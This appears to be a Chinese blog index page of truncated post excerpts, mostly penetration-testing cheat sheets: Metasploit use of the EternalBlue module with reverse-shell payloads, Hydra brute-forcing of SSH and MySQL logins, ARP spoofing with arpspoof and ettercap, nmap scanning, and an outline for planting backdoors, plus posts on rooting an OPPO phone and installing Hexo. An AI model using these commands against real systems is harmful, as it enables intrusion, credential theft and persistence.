msfconsole命令
攻击模块软件更新
apt update # 更新安装包信息;只检查,不更新
apt upgrade # 更新已安装的软件包,不删除旧包;
apt full-upgrade # 升级包,删除旧包
基础使用
msfconsole //进入框架
search ms17_010 //使用search命令查找相关漏洞
use exploit/windows/smb/ms17_010_eternalblue //使用use进入模块
info //使用info查看模块信息
show options //查看参数
set RHOST 192.168.100.158 //设置参数
exploit/run
辅助模块(auxiliary)
漏洞利用(exploit)
攻击载荷(payload): Stager中几种常见的payload: windows/meterpreter/bind_tcp //正向连接 windows/meterpreter/reverse_tcp //反向连接,常用 windows/meterpreter/reverse_http ...
hydra命令
参数详解-l login 小写,指定用户名进行破解
-L file 大写,指定用户的用户名字典
-p pass 小写,用于指定密码破解,很少使用,一般采用密码字典
-P file 大写,用于指定密码字典
-s PORT 指定默认端口
-C使用冒号分割格式,例如“登录名:密码”来代替 -L/-P 参数
-e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探
-M file 指定目标ip列表文件,批量破解
-o file 指定结果输出文件
-f 找到第一对登录名或者密码的时候中止破解
-t tasks 同时运行的线程数,默认是16
-S大写,采用SSL链接
-w time 设置最大超时时间,单位
-v / -V 显示详细过程
-R 恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。)
-x 自定义密码
爆破协议举例SSH暴力破解
hydra -L 用户名字典 -P 密码字典 -t -vV -o ssh.log -e ns IP ssh
mysql暴力破解
hydra -L 用户名字典 -P 密码字典 -t 5 I ...
arp欺骗
使用arpspoof命令:arpspoof -i eth0 -t 目标IP地址 网关IP地址
-i interface 指定要使用的接口。-c own|host|both 指定范围own|host|both(自己|主机|两者)-t target 指定一台特定主机进行ARP(如果未指定,则为LAN上的所有主机)-r 两个主机(主机和目标)以捕获两个方向的流量。(仅对-t有效)host 指定您希望抓取数据包的host(通常是本地网关)
使用ettercap -G 蜘蛛工具实例演示-arp欺骗
1.打开ettercap,选择你要使用的网卡,点击”对号”。
2.点击”搜索”按钮,进行主机发现。
3.点击”红色方框里面的按钮”,我们可以查看”host list”.
4.将想要欺骗的网关和受害者分别添加到”add to target 1”和”add to target 2”。
5.点击”圆圈”,选择”arp poisoning spoofing”。
6.选择”sni ...
nmap命令
常用命令总结命令格式
nmap [参数] [ip]
主机探测(隐蔽扫描/TCP ACK/TCP SYN/TCP空扫描欺骗防火墙)
nmap -sS/-PS/-PA/-sN ip
命令表格
命令
描述
nmap IP
扫描IP
nmap -v IP
加强扫描
nmap IP1 IP2 …
扫描多IP
nmap a.b.c.*
扫描整个子网
nmap a.b.c.x,y,…
扫描多子网地址
nmap -iL xxx.txt
根据文件扫描多IP
nmap a.b.c.x-y
扫描子网IP范围
nmap a.b.c.* —exclude IP
排除指定IP扫描整个子网
nmap -A IP
扫描操作系统和路由跟踪
nmap -O IP
探测操作系统
nmap -sA/-PN IP
探测防火墙
nmap -sP a.b.c.*
探测在线主机
nmap -F IP
快速扫描
nmap -r IP
按顺序扫描
nmap -iflist
显示接口和路由信息
nmap -p n1,n2… IP
扫描指定端口
nmap -p ...
安全-内网渗透
信息收集主机存活 ettercap -G 蜘蛛 nmap nmap -sS 网段
漏洞搜集 awvs 网站扫描 gvm(openvas) 系统扫描 nmap nmap —script=vuln //常见漏洞 nmap —script-default //默认收集信息脚本
进入目标后提权 创建高权限用户 windows net use linux user add
留后门 创建木马 木马(msfconsole) 上传木马 meterpreter upload
攻击方式改变流量走向 ettercap(arp欺骗、dns劫持等) arpspoof arpspoof -i 网卡名称 -t 目标IP 网关
爆破密码 hydra(九头蛇) msfconsole(爆破密码模块)
漏洞攻击 msfconsole(漏洞攻击目录)
oppoA9 mtk手机root
mtk手机root通过mtkclient工具连接手机漏洞后,导出boot文件,修补后导回,完成root。
mkclient下载地址,可通过下方网友地址,或者github上获取:
https://xinkid.lanzouv.com/b075nltgh 密:canxin
1、oppoA9为例,打开mtkclient工具,手机关机后按住音量+-键,插入数据线,等待软件连接2、连接后通过读分区导出boot文件,不带后缀3、手机开机安装magisk,通过面具修补boot文件,boot文件改回bin后缀
4、同样通过第一步连接手机,刷入修补好的boot文件,重新启动发现无需按电源键即可开机,代表已成功root。
hexo博客安装方法
termuxtermux安装准备pkg换源1234567sed -i 's@^\(deb.*stable main\)$@#\1\ndeb https://mirrors.tuna.tsinghua.edu.cn/termux/termux-packages-24 stable main@' $PREFIX/etc/apt/sources.listpkg updatepkg install nodejs-ltspkg install gitpkg install vim
需要在目录下运行安装123mkdir hexochmod 777 hexocd hexo
hexonpm换源(淘宝)1npm config set registry https://registry.npmmirror.com
安装12npm install hexo-cli -ghexo init
启动命令12hexo ghexo s
主题下载主题1git clone -b master https://github.com/jerryc127/hexo-theme-butterfly.git t ...
数据库加载中
